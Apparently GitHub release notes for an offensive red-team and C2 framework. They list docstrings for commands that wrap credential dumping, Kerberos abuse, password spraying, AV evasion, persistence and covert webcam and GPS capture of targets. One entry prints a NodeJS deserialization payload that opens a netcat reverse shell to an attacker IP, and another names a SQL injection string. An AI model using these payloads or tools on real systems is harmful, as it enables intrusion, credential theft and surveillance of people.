release/0.2.28

What's Changed

• Create FUNDING.yml by @grisuno in #82

Full Changelog: release/0.2.26...release/0.2.28

c2asm

Display C and ASM code side by side in a curses-based interface.

This function sets up a curses window to display C code and its corresponding
assembly code side by side. It allows the user to select a .c file from the
'sessions' directory and then displays the code with scrolling capabilities
both vertically and horizontally. A green vertical line separates the C code
from the ASM code.

Parameters:
stdscr (curses.window): The curses window object to draw on.

Returns:
None

view_code

Display C and ASM code side by side in a curses-based interface.

This function sets up a curses window to display C code and its corresponding
assembly code side by side. It allows the user to select a .c file from the
'sessions' directory and then displays the code with scrolling capabilities
both vertically and horizontally. A green vertical line separates the C code
from the ASM code.

Parameters:
stdscr (curses.window): The curses window object to draw on.

Returns:
None

camphish

Executes the camphish tool for Grab cam shots from target's phone front camera or PC webcam just sending a link.

This function:
- Installs camphish if not already installed.
- Executes the camphish command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires git and php to be installed.
- Uses a one-liner installation method for simplicity.

Usage:
camphish

hound

Executes the hound tool for Hound is a simple and light tool for information gathering and capture exact GPS coordinates

This function:
- Installs hound if not already installed.
- Executes the hound command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires git and php to be installed.
- Uses a one-liner installation method for simplicity.

Usage:
hound

ofuscatesh

Obfuscates a shell script by encoding it in Base64 and prepares a command to decode and execute it.

This function reads the content of a shell script file, encodes it in Base64, and constructs a command
that can be used to decode and execute the encoded script using echo and base64 -d.

Args:
line (str): The path to the shell script file to be obfuscated. If not provided, a default
path is obtained from the get_users_dic function.

Returns:
None

Example:
>>> ofuscatesh /path/to/script.sh or just ofuscatesh
# This will read the script, encode it in Base64, and prepare a command to decode and execute it.

load_session

Load the session from the sessionLazyOwn.json file and display the status of various parameters.

This command reads the sessionLazyOwn.json file from the sessions directory and displays the status
of parameters, credentials, hashes, notes, plan, id_rsa, implants, and redop.

:param line: Additional arguments (not used in this command)

lateral_mov_lin

Perform lateral movement by downloading and installing LazyOwn on a remote Linux machine.

This function automates the process of setting up an APT and PIP proxy, downloading the LazyOwn package,
transferring it to a remote machine, and installing it. The function ensures that all necessary directories
are created and that the package is correctly installed on the remote machine.

Parameters:
line (str): The command line input, which is not used in this function.

Returns:
None

release/0.2.26

What's Changed

• new C2 con todas las características... by @grisuno in #79

Full Changelog: release/0.2.25...release/0.2.26

atomic_lazyown

Genera y ejecuta pruebas de Atomic Red Team usando el C2.

Parameters:
line (str): Lista de IDs de técnicas separadas por espacios.

Returns:
None

upload_file_to_c2

Sube un archivo al C2.

Parameters:
file_path (str): Ruta del archivo a subir.

Returns:
None

download_file_from_c2

Descarga un archivo desde el C2.

Parameters:
file_name (str): Nombre del archivo a descargar.
clientid (str): Identificador del cliente (opcional).

Returns:
None

issue_command_to_c2

Ejecuta un comando en el cliente usando el C2.

Parameters:
command (str): Comando a ejecutar.

Returns:
None

ofuscatorps1

Obfuscates a PowerShell script using various techniques.
by @JoelGMSec https://github.com/JoelGMSec/Invoke-Stealth/ rewite in python by grisun0
This function:
- Displays a banner and help information if requested.
- Validates the provided parameters.
- Executes all obfuscation techniques on the input PowerShell script by default.
- Displays the result in the terminal.

Behavior:
- Requires python3 to be installed for certain techniques.
- Uses parameters from the command line for the script path and optional flags.

Usage:
ofuscatorps1 <script_path> [-nobanner]

Techniques:
- Chameleon: Substitute strings and concatenate variables.
- BetterXencrypt: Compresses and encrypts with random iterations.
- PyFuscation: Obfuscate functions, variables, and parameters.
- ReverseB64: Encode with base64 and reverse it to avoid detections.
- PSObfuscation: Convert content to bytes and compress with Gzip.
- All: Sequentially executes all techniques described above.

d3monizedshell

Executes the D3m0n1z3dShell tool for persistence in Linux.

This function:
- Installs D3m0n1z3dShell if not already installed.
- Executes the D3m0n1z3dShell command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires git and curl to be installed.
- Uses a one-liner installation method for simplicity.

Usage:
d3monizedshell

scp

Copies the local "sessions" directory to a remote host using scp, leveraging sshpass for automated authentication.

Steps:
1. Verifies if the credentials file exists in the "sessions" directory.
If not, prompts the user for a username and password.
2. Reads the credentials file if it exists and extracts the username and password.
3. Constructs an scp command to deploy the "sessions" directory to the remote host.
4. Executes the scp command using the system shell.

Args:
line (str): Input command line (optional). The third parameter can be 'win' or 'lin' to specify the target OS.

Dependencies:
- The sshpass command-line tool must be installed on the local machine.
- scp must be installed on both the local and remote machines.
- The remote host must be accessible via SSH.

Attributes:
- self.params: Dictionary containing the following keys:
- username (str, optional): Predefined username. Defaults to prompting the user if not provided.
- password (str, optional): Predefined password. Defaults to prompting the user if not provided.
- rhost (str): Remote host's IP or domain name.

Raises:
- KeyError: If rhost is not provided in self.params.
- FileNotFoundError: If the "sessions" directory does not exist.

Note:
- The credentials.txt file, if present, should have credentials in the format username:password
on the first line.

Returns:
None

apt_proxy

Configures the local machine with internet access to act as an APT proxy for a machine without internet access.

Steps:
1. Installs and configures apt-cacher-ng on the local machine.
2. Generates the necessary commands to configure the remote machine to use the proxy.
3. Copies the commands to the clipboard using the copy2clip function.

Parameters:
line (str): The IP address of the remote machine without internet access.

Returns:
None

pip_proxy

Configures the local machine with internet access to act as a pip proxy for a machine without internet access.

Steps:
1. Installs and configures squid on the local machine.
2. Generates the necessary commands to configure the remote machine to use the proxy.
3. Copies the commands to the clipboard using the copy2clip function.

Parameters:
line (str): The IP address of the remote machine without internet access.

Returns:
None

internet_proxy

Configures the local machine with internet access to act as a proxy for a machine without internet access.

Steps:
1. Installs and configures squid on the local machine.
2. Generates the necessary commands to configure the remote machine to use the proxy.
3. Copies the commands to the clipboard using the copy2clip function.

Parameters:
line (str): The IP address of the remote machine without internet access.

Returns:
None

check_update

Checks for updates by comparing the local version with the remote version.

This function:
- Fetches the remote version from a JSON file hosted on GitHub.
- Reads the local version from a JSON file in the script's root directory.
- Compares the version numbers and determines if an update is needed.

Behavior:
- Requires requests library to fetch the remote version.
- Uses JSON parsing to extract version numbers.

Usage:
check_update

wmiexecpro

Executes wmiexec-pro with various options for WMI operations.

This function handles the installation of wmiexec-pro and its dependencies,
and allows the user to execute various WMI operations with minimal input.
It reads credentials from a specified file and constructs the necessary
commands to interact with the target system.

:param line: Command line input from the user. This input is used to
determine the module and action to be executed.
:returns: None

The function performs the following steps:

1. Checks if wmiexec-pro and its dependencies are installed. If not, it
   installs them in specified directories.
2. Reads credentials from a file.
3. Constructs and executes the wmiexec-pro command based on user input.
4. Enumerates available modules and actions for each module, allowing the
   user to select them interactively.
5. Enumerates available options for each action, allowing the user to select
   them interactively.

Example usage:

do_wmiexecpro("enum -run")

This will execute the enumeration module with the -run action.

If no specific command is provided, the function will prompt the user to
select a module and action interactively.

create_session_json

Generates or updates a JSON file to be used as a database.

The JSON file will be named sessionLazyOwn_{timestamp}.json and will be stored
in the sessions directory. The JSON file will contain data from self.params
and additional data extracted from credentials*.txt and hash*.txt files.

The structure of the JSON file will be as follows:

• params: Data from self.params.
• credentials: A list of dictionaries containing usernames and passwords extracted
  from credentials*.txt files.
• hashes: A list of dictionaries containing the contents of hash*.txt files.
• notes: The content of the notes.txt file, if it exists.

Returns:
None

shellcode2elf

Convert shellcode into an ELF file and infect it.

This function takes an optional input line that specifies the name of the shellcode file.
If no input line is provided, a filename is generated based on the domain. The function reads
the shellcode and inserts it into a C source file, then compiles the source file into an ELF
file. It also creates an infected version of the ELF file and uploads all generated files to a
command and control (C2) server.

Args:
line (str): An optional input line that specifies the name of the shellcode file.

Returns:
None

ssh_cmd

Perform Remote Execution Command trow ssh using grisun0 user, see help grisun0

Parameters:
line (str): The command line input, is the command to execute, if not presented is whoami

Returns:
None

clone_site

Clone a website and serve the files in sessions/{url_cloned}.
Args:
line (str): input line that url to clone

Returns:
None

knokknok

Send special string to trigger a reverse shell, with the command 'c2 client_name'
create a listener shell script to drop the reverse shell in python3
Args:
line (str): input line not used

Returns:
None

listener_go

Configures and starts a listener for a specified victim.

This function takes a command line input to configure and start a listener for a specified victim.
The input should include the victim ID, the choice of listener type, and optionally the port numbers.
The function then constructs the appropriate command to start the listener and assigns the necessary
parameters.

Args:
line (str): The command line input containing the victim ID, listener type, and optional port numbers.

Returns:
None

Raises:
None

Example:
>>> listener_go victim1 2 1337 7777

listener_py

Configures and starts a listener for a specified victim.

This function takes a command line input to configure and start a listener for a specified victim.
The input should include the victim ID, the choice of listener type, and optionally the port numbers.
The function then constructs the appropriate command to start the listener and assigns the necessary
parameters.

Args:
line (str): The command line input c...

release/0.2.25

What's Changed

• Dev6 by @grisun0 in #77

Full Changelog: release/0.2.24...release/0.2.25

release/0.2.24

What's Changed

• some utils 9 jajaja? by @grisun0 in #75

Full Changelog: release/0.2.23...release/0.2.24

C2 New Look and HotFix Atomic RedTeam Path in C2

release/0.2.23

What's Changed

• some utils 8 jajaja? by @grisun0 in #73

Full Changelog: release/0.2.22...release/0.2.23

gmsadumper

Executes the gMSADumper tool to read and parse gMSA password blobs accessible by the user.

This function:
- Installs gMSADumper if not already installed.
- Executes the gMSADumper command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
gmsadumper -u -p -d
gmsadumper -u -p <LM:NT hash> -d -l <ldap_server>
gmsadumper -k -d -l <ldap_server>

dnschef

Executes the DNSChef tool to monitor DNS queries and intercept responses.

This function:
- Installs DNSChef if not already installed.
- Executes the DNSChef command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
dnschef

dploot

Executes the dploot tool to loot DPAPI related secrets from local or remote targets.
Actions: backupkey,blob,browser,certificates,credentials,machinecertificates,machinecredentials,machinemasterkeys,machinevaults,masterkeys,mobaxterm,rdg,sccm,vaults,wam,wifi
This function:
- Installs dploot if not already installed.
- Executes the dploot command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
dploot -d -u -p -t
dploot -k -d -t

banners

createpayload

Generates an obfuscated payload to evade AV detection using the payloadGenerator tool. thanks to smokeme

This function:
- Clones the payloadGenerator repository if not already cloned.
- Installs .NET Framework 4.5 if not already installed.
- Executes the generator.py script with the provided IP, port, and XOR key.
- Displays the result in the terminal.
Parameters:
line (str): lenght of xor key
Behavior:
- Requires git and dotnet to be installed.
- Uses parameters from self.params for IP, port, and XOR key.

Usage:
createpayload

bin2shellcode

Converts a binary file to a shellcode string in C or Nim format.

This function:
- Reads a binary file and converts its contents to a shellcode string.
- Supports both C and Nim formats.
- Displays the result in the terminal and saves it to a file.

Behavior:
- Requires the filename, width, quotes, and format parameters.
- Uses default values if parameters are not provided.
- Uses parameters from self.params for filename, width, quotes, and format.

Usage:
bin2shellcode [ [ [ []]]]

release/0.2.22

What's Changed

• some utils 7 jajaja? by @grisuno in #71

Full Changelog: release/0.2.21...release/0.2.22

spraykatz

Executes the Spraykatz tool to retrieve credentials on Windows machines and large Active Directory environments.

This function:
- Installs Spraykatz if not already installed.
- Executes the Spraykatz command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, git, and nmap to be installed.
- Uses parameters from self.params for username, password, and target.

Usage:
spraykatz

caldera

Installs and starts the Caldera server.

This function:
- Clones the Caldera repository recursively.
- Installs the required dependencies.
- Optionally installs GoLang (1.19+).
- Starts the Caldera server with the provided parameters.

Behavior:
- Requires git, python3, and pip3 to be installed.
- Uses parameters from self.params for version/release.

Usage:
caldera

ntpdate

Synchronizes the system clock with a specified NTP server.

This method constructs the target NTP server address using the domain and subdomain
parameters. It then prompts the user to confirm or modify the target address.
Finally, it executes the ntpdate command to synchronize the system clock with
the specified NTP server.

:param line: The command line input (not used in this method).
:type line: str
:return: None

ticketer

Executes the Impacket ticketer tool to create a golden ticket.

This function performs the following actions:

1. Checks if the target host is valid.
2. Prompts the user for the NTLM hash, domain SID, domain name, DC IP, SPN, and username.
3. Constructs and executes the Impacket ticketer command with the provided information.

Parameters:
line (str): A command argument to determine the authentication mode.
This parameter is not used in this function.

Returns:
None

links

Displays a list of useful links and allows the user to select and copy a link to the clipboard.

This function performs the following actions:

1. Defines a list of links with their aliases.
2. Filters the links based on the input line if provided.
3. Displays the filtered links with their aliases and URLs.
4. Prompts the user to select a link by entering the corresponding number.
5. Copies the selected link to the clipboard.

Parameters:
line (str, optional): A string to filter the links. If provided, only the links containing
the string in their alias or URL will be displayed. Defaults to an empty string.

Returns:
None

rsync

Synchronizes the local "sessions" directory to a remote host using rsync, leveraging sshpass for automated authentication.

Steps:
1. Verifies if the credentials file exists in the "sessions" directory.
If not, prompts the user for a username and password.
2. Reads the credentials file if it exists and extracts the username and password.
3. Constructs an rsync command to deploy the "sessions" directory to the remote host.
4. Executes the rsync command using the system shell.

Args:
line (str): Input command line (not used in the current implementation).

Dependencies:
- The sshpass command-line tool must be installed on the local machine.
- rsync must be installed on both the local and remote machines.
- The remote host must be accessible via SSH.

Attributes:
- self.params: Dictionary containing the following keys:
- username (str, optional): Predefined username. Defaults to prompting the user if not provided.
- password (str, optional): Predefined password. Defaults to prompting the user if not provided.
- rhost (str): Remote host's IP or domain name.

Raises:
- KeyError: If rhost is not provided in self.params.
- FileNotFoundError: If the "sessions" directory does not exist.

Note:
- The credentials.txt file, if present, should have credentials in the format username:password
on the first line.

Returns:
None

pre2k

Executes the pre2k tool to query the domain for pre-Windows 2000 machine accounts or to pass a list of hostnames to test authentication.

This function:
- Installs pre2k if not already installed.
- Executes the pre2k command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
pre2k auth -u -p -d -dc-ip <dc_ip>
pre2k unauth -d -dc-ip <dc_ip> -inputfile

gmsadumper

Executes the gMSADumper tool to read and parse gMSA password blobs accessible by the user.

This function:
- Installs gMSADumper if not already installed.
- Executes the gMSADumper command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
gmsadumper -u -p -d
gmsadumper -u -p <LM:NT hash> -d -l <ldap_server>
gmsadumper -k -d -l <ldap_server>

dnschef

Executes the DNSChef tool to monitor DNS queries and intercept responses.

This function:
- Installs DNSChef if not already installed.
- Executes the DNSChef command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
dnschef

dploot

Executes the dploot tool to loot DPAPI related secrets from local or remote targets.
Actions: backupkey,blob,browser,certificates,credentials,machinecertificates,machinecredentials,machinemasterkeys,machinevaults,masterkeys,mobaxterm,rdg,sccm,vaults,wam,wifi
This function:
- Installs dploot if not already installed.
- Executes the dploot command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
dploot -d -u -p -t
dploot -k -d -t

banners

createpayload

Generates an obfuscated payload to evade AV detection using the payloadGenerator tool. thanks to smokeme

This function:
- Clones the payloadGenerator repository if not already cloned.
- Installs .NET Framework 4.5 if not already installed.
- Executes the generator.py script with the provided IP, port, and XOR key.
- Displays the result in the terminal.
Parameters:
line (str): lenght of xor key
Behavior:
- Requires git and dotnet to be installed.
- Uses parameters from self.params for IP, port, and XOR key.

Usage:
createpayload

bin2shellcode

Converts a binary file to a shellcode string in C or Nim format.

This function:
- Reads a binary file and converts its contents to a shellcode string.
- Supports both C and Nim formats.
- Displays the result in the terminal and saves it to a file.

Behavior:
- Requires the filename, width, quotes, and format parameters.
- Uses default values if parameters are not provided.
- Uses parameters from self.params for filename, width, quotes, and format.

Usage:
bin2shellcode [ [ [ []]]]

release/0.2.21

What's Changed

• some utils 6 jajaja? by @grisun0 in #69

Full Changelog: release/0.2.20...release/0.2.21

utf

Encode a given payload into UTF-16 escape sequences.

This function takes a payload string and encodes each character into its
UTF-16 hexadecimal representation (e.g., A becomes A). If no
payload is provided as input, it prompts the user to input one, with a
default value of ' or 1=1-- -.

Parameters:
line (str): The input payload to encode. If empty, the user is prompted
to provide one interactively.

Returns:
None: The encoded payload is printed to the console.

dcomexec

Executes the Impacket dcomexec tool to run commands on a remote system using DCOM.

This function performs the following actions:

1. Validates the target host (rhost) and domain parameters.
2. If the line argument is "pass", it searches for credential files with the pattern credentials*.txt,
   allows the user to select credentials, and constructs the dcomexec command using them.
3. If the line argument is "hash", it searches for a hash file, prompts the user for a username, and
   constructs the dcomexec command using the hash.
4. If line does not match "pass" or "hash", it displays an error message with usage instructions.

Parameters:
line (str): A command argument to determine the authentication mode.
If "pass", the function searches for credential files and authenticates using the selected file.
If "hash", it uses a hash file for authentication.
If neither, it prints an error message with usage instructions.

Returns:
None

pip_repo

Sets up a local pip repository and serves it via an HTTP server for offline installations.

This function performs the following actions:

1. Creates a directory for storing pip packages if it does not already exist.
2. Downloads a predefined list of Python packages along with their dependencies to the repository directory.
3. Organizes the downloaded packages into their respective directories.
4. Starts an HTTP server to host the repository, allowing remote machines to install the packages.

The repository path is created under the sessions directory, and the packages are served using Python's
built-in HTTP server at port 8008.

Parameters:
line (str): Optional argument for the command. Not used in this implementation but retained for compatibility
with the cmd2 framework.

Returns:
None

apt_repo

Creates a local APT repository and serves it via a web server.

This function performs the following actions:

1. Creates a directory for storing .deb packages.
2. Downloads the specified APT packages and their dependencies into the repository.
3. Generates the necessary APT repository indexes.
4. Starts a web server to host the repository for remote clients.

Parameters:
line (str): A space-separated list of package names to include in the repository.

Returns:
None

httprobe

Executes the httprobe tool to probe domains for working HTTP and HTTPS servers.

This function performs the following actions:

1. Verifies if httprobe is installed; if not, it installs the tool automatically.
2. Probes domains from the input file or standard input.
3. Simplifies the user experience by minimizing required commands and leveraging self.params for defaults.

Parameters:
line (str): Optional command arguments specifying the domain or just httprobe.
Example usage:
just provide the domain: httprobe example.com

Returns:
None

eyewitness_py

Automates EyeWitness installation and execution without requiring user input.

This function installs EyeWitness if it is not already available, uses a default input file
(urls.txt), and applies standard configurations to execute a web enumeration task
automatically. No arguments or manual intervention are needed from the user.

Behavior:
- Installs EyeWitness if missing.
- Uses urls.txt as the default input file.
- Sets a default timeout of 60 seconds.
- Automatically executes EyeWitness with predefined settings.

Usage:
witness

pup

Processes HTML content from a specified URL using the pup utility and a default CSS selector.

This function:
- Retrieves HTML content from the URL stored in self.params["url"] using curl.
- Filters the HTML content using the pup utility with a predefined CSS selector.
- Displays the filtered result in the terminal.

Behavior:
- Requires pup to be installed.
- Uses self.params["url"] as the source URL.
- Applies the CSS selector 'table table tr:nth-last-of-type(n+2) td.title a' by default.

Usage:
pup

recon

Performs reconnaissance on a specified domain using crt.sh (the target must be visible on internet), pup, httprobe, and EyeWitness.

This function automates the process of gathering subdomains for a given domain, verifying
their reachability, and generating a report using the EyeWitness tool.

Workflow:
1. Determines the target domain from the line argument or defaults to self.params["domain"].
2. Queries the crt.sh certificate transparency logs for subdomains using curl.
3. Filters and extracts domain-related text data using pup.
4. Sorts and removes duplicate entries, then validates subdomains with httprobe.
5. Saves the results to a temporary file.
6. Executes EyeWitness to generate a web-based reconnaissance report for the subdomains.

Requirements:
- pup: A command-line HTML parser.
- httprobe: A tool to check live HTTP/HTTPS endpoints.
- EyeWitness: A tool for generating web reconnaissance reports.

Parameters:
line (str): The domain to target for reconnaissance. If omitted, the domain defaults to self.params["domain"].

Examples:
1. Specify a domain directly:
>>> recon domain.com

2. Use the default domain from self.params:
    >>> recon

Raises:
None. Errors in execution will be logged or printed as part of the command output.

digdug

Executes Dig Dug to inflate the size of an executable file, leveraging pre-configured settings
and interactive input for minimal user effort.

This function integrates with the Dig Dug tool to increase an executable's size by appending
dictionary words. It automates repository setup, selects the input file from user prompts or defaults,
and uses sensible configurations to execute the inflation process. Dig Dug is particularly useful
for evading AV/EDR detections by exceeding size thresholds for analysis.

Behavior:
- Automatically clones the Dig Dug repository if not already present in external/.exploit/DigDug.
- Calls the venom command to prepare the necessary payloads for execution.
- Prompts the user to select an input executable and specify the desired size increase.
- Uses a default dictionary (google-10000-english-usa-gt5.txt) for padding.

Requirements:
- A Python environment with required dependencies.
- Executable files available in the working directory or sessions.

Usage:
Invoke this function to inflate the size of a generated payload or user-specified executable.
Interactive prompts will guide the input selection and size configuration.

Examples:
1. Increase the size of a selected payload by 100 MB:
>>> digdug

2. Use the default configurations to inflate an executable:
    No additional parameters are required. The user is prompted for size and file selection.

adsso_spray

Performs a password spray attack on Azure Active Directory Seamless Single Sign-On (SSO) using a specified list of users.

This function automates the process of spraying a given password across multiple user accounts in a target domain. It utilizes
a user list in the form of a text file, targeting Azure AD Seamless SSO endpoints. The results are processed and saved to
a specified output file, providing insights into which accounts were successful or failed during the attack.

Requirements:
- A valid domain and URL for the target Azure AD instance. (assing url https://url.com)
- A user dictionary file containing usernames (without the domain) to be sprayed.

Parameters:
line (str): Command-line input passed to the function (not currently used in the function).

Behavior:
- Loads the domain and URL from the configuration stored in self.params.
- Reads the user list from a file specified in get_users_dic.
- Sprays the specified password to all users and processes the results.
- Saves the successful and failed attempts to the output file.

Example:
- Perform a password spray attack with the password "admin" and save the results:
>>> adsso_spray
- Customize the password or user list by modifying self.params before invoking the function.

creds_py

Searches for default credentials associated with a specific product or vendor, using the Default Credentials Cheat Sheet.

This function automates the process of querying the Default Credentials Cheat Sheet for default credentials of various products.
It searches for the specified product or vendor, providing relevant default credentials for pentesters during engagements.

Behavior:
- Automatically clones the Default Credentials Cheat Sheet repository if not already present in external/.exploit/DefaultCreds.
- Executes a search command with the product/vendor specified by the user.
- Returns the default credentials for the requested product or vendor.

Requirements:
- Python environment with necessary dependencies.
- Access to the Default Credentials Cheat Sheet repository.

Usage:
Run this function to search for default credentials related to a product or vendor.
The user is p...

release/0.2.20

What's Changed

• some utils 5 jajaja? by @grisun0 in #67

Full Changelog: release/0.2.19...release/0.2.20

getnthash_py

Executes the getnthash.py tool from PKINITtools to retrieve the NT hash using a Kerberos U2U TGS request.

This function performs the following actions:

1. Checks if PKINITtools is installed; if not, it clones the repository and installs dependencies.
2. Retrieves the NT hash using the AS-REP key from a previously generated TGT.

Parameters:
line (str): Command arguments specifying the AS-REP key and target identity.
Expected format:
- identity
- Additional flags like -key KEY, -dc-ip ip address, etc.

Returns:
None

gets4uticket_py

Executes the gets4uticket.py tool from PKINITtools to request an S4U2Self service ticket using Kerberos.

This function performs the following actions:

1. Checks if PKINITtools is installed; if not, it clones the repository and installs dependencies.
2. Requests a service ticket using the S4U2Self protocol and outputs it to the specified ccache file.

Parameters:
line (str): Command arguments specifying the kerberos_connection_url, SPN, target user, and ccache.
Expected format:
- kerberos_connection_url spn targetuser ccache
- Additional flags like -v for verbose output.

Returns:
None

aclpwn_py

Executes the aclpwn.py tool to find and exploit ACL paths for privilege escalation in an Active Directory environment.

This function performs the following actions:

1. Checks if aclpwn is installed; if not, it installs the package.
2. Finds an exploit path using specified starting and target points in Active Directory.
3. Executes the path to escalate privileges if the path is found.

Parameters:
line (str): Command arguments specifying the find and target points, domain, and optional flags.
Expected format:
- -f starting_point -ft starting_type -d domain
- Additional flags like -t target, -tt target_type, --server, -dry, --restore, etc.

Returns:
None

addspn_py

Executes the addspn.py tool to manage Service Principal Names (SPNs) on Active Directory accounts via LDAP.

This function performs the following actions:

1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
2. Adds, removes, or queries SPNs on the specified target based on the provided options.

Parameters:
line (str): Command arguments specifying the target hostname, user credentials, and SPN actions.
Expected format:
- hostname user password target spn -options
- Options include:
- -r to remove an SPN
- -q to query current SPNs
- -a to add SPN via msDS-AdditionalDnsHostName

Returns:
None

dnstool_py

Executes the dnstool.py tool to modify Active Directory-integrated DNS records.

This function performs the following actions:

1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
2. Modifies DNS records by adding, removing, or querying based on the specified options.

Parameters:
line (str): Command arguments specifying the DNS action, target record, and data.
Expected format:
- hostname user password record action -options
- Options include:
- -a to add a record
- -r to remove a record
- --forest to target ForestDnsZones

Returns:
None

printerbug_py

Executes the printerbug.py tool to trigger the SpoolService bug via RPC backconnect.

This function performs the following actions:

1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
2. Executes the printerbug tool to attempt an RPC backconnect to the specified attacker host.

Parameters:
line (str): Command arguments specifying the target and attacker host.
Expected format:
- target_username@target_host attacker_host

Returns:
None

krbrelayx_py

Executes the krbrelayx.py tool for Kerberos relaying or unconstrained delegation abuse.

This function performs the following actions:

1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
2. Relays Kerberos tickets or abuses unconstrained delegation to access target services.

Parameters:
line (str): Command arguments specifying the target and options.
Expected format:
- target options
- Options include:
- -t target_host to specify the target host
- -l loot directory to save TGTs or dump information

Returns:
None

autoblody

Executes the autobloody tool for automating Active Directory privilege escalation paths.

This function performs the following actions:

1. Checks if autobloody is installed; if not, it clones the repository and installs dependencies.
2. Executes the autobloody command to find and exploit privilege escalation paths.

Parameters:
line (str): Command arguments specifying the source and target objects and options.
Expected format:
- -u username for NTLM authentication
- -p password for NTLM authentication
- --host domain_controller_ip for the IP of the Domain Controller
- -dp neo4j_password for Neo4j database password
- -ds source_label for the source node label in BloodHound
- -dt target_label for the target node label in BloodHound

Returns:
None

upload_gofile

Uploads a file to Gofile storage.

This function performs the following actions:

1. Prepares the file and folder ID for upload.
2. Sends a POST request to Gofile API with the file and authorization token.
3. Handles the response from the API and prints the result.

Parameters:
line (str): Command arguments specifying the file path and options.
Expected format:
- <file_path>
- Options include:
- --folderId <folder_id> to specify the folder where the file should be uploaded

Returns:
None

unicode_WAFbypass

    We open a Netcat listener on port 443 and attempt to exploit NodeJS deserialization by sending the
    following payload:
    {"rce":"_$$ND_FUNC$$_function() {require('child_process').exec('nc -e /bin/bash 10.10.xx.xx 443',function(error,stdout,stderr) {console.log (stdout) });

}()"}
Some WAF can be bypassed with the use of unicode characters.

    Generate an obfuscated payload, encode it in base64, and append the SSH public key to the authorized_keys file.
    
    Args:
        ip_address (str): The IP address for the reverse shell connection.
        port (int): The port for the reverse shell connection.
        ssh_public_key (str): The SSH public key to add to authorized_keys.
    
    Returns:
        str: The base64-encoded obfuscated payload.

sqli_mssql_test

Initiates a reverse MSSQL shell by starting an HTTP server to handle incoming connections and exfiltrate data.

This function does the following:

1. Starts an HTTP server to listen for connections from the MSSQL server.
2. Intercepts and decodes responses from the target server.
3. Prompts the user to enter commands, sends them to the target, and displays the output.

Parameters:
line (str): Unused command argument from the cmd2 prompt.

Returns:
None

targetedKerberoas

Executes the targetedKerberoast tool for extracting Kerberos service tickets.

This function performs the following actions:

1. Verifies the presence of the targetedKerberoast tool; if not installed, it clones the repository and installs dependencies.
2. Prompts for parameters such as the domain, username, and other configurations required by targetedKerberoast.
3. Executes the targetedKerberoast tool with specified options for obtaining "kerberoastable" hashes.

Parameters:
line (str): Command arguments specifying the user, domain, and options.
Expected format:
- domain user hash or password [optional parameters]

Returns:
None

pyoracle2

Executes the pyOracle2 tool for performing padding oracle attacks.

This function performs the following actions:

1. Verifies the presence of the pyOracle2 tool; if not installed, it clones the repository and installs dependencies.
2. Prompts the user for configuration parameters or retrieves them from self.params to create a job-specific configuration file.
3. Executes the pyOracle2 tool using the generated configuration file and specified options.

Parameters:
line (str): Command arguments specifying additional tool options if required.
Expected format: [optional parameters]

Returns:
None

paranoid_meterpreter

Creates and deploys a paranoid Meterpreter payload and listener with SSL/TLS pinning and UUID tracking.

This function performs the following actions:

1. Generates a self-signed SSL/TLS certificate for payload encryption.
2. Creates either staged or stageless Meterpreter payloads with UUID tracking and TLS pinning.
3. Configures and launches a Metasploit listener for the payload.

Parameters:
line (str): Command arguments specifying target configurations.
Expected format:
- rhost lhost domain subdomain

Returns:
None

lfi

Exploits a potential Local File Inclusion (LFI) vulnerability by crafting
and sending HTTP GET requests to a specified URL.

The user can specify the target URL directly via the line parameter or
provide it interactively. If no URL is provided, the method uses a default
value stored...

release/0.2.19

What's Changed

• some utils 4 jajaja? by @grisun0 in #66

Full Changelog: release/0.2.18...release/0.2.19

release/0.2.18

What's Changed

• some utils 3 jajaja by @grisun0 in #64

Full Changelog: release/0.2.17...release/0.2.18